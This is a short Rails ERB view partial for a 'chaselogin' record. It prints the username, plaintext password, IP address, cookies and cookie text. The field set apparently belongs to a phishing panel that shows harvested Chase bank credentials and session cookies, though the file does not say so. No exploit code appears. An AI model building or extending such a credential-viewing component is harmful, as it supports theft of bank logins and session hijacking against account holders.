<div id="<%= dom_id chaselogin %>">
  <p>
    <strong>Username:</strong>
    <%= chaselogin.username %>
  </p>

  <p>
    <strong>Password:</strong>
    <%= chaselogin.password %>
  </p>

  <p>
    <strong>Ip address:</strong>
    <%= chaselogin.ip_address %>
  </p>

  <p>
    <strong>Cookies:</strong>
    <%= chaselogin.cookies %>
  </p>

  <p>
    <strong>Cookies text:</strong>
    <%= chaselogin.cookies_text %>
  </p>

</div>
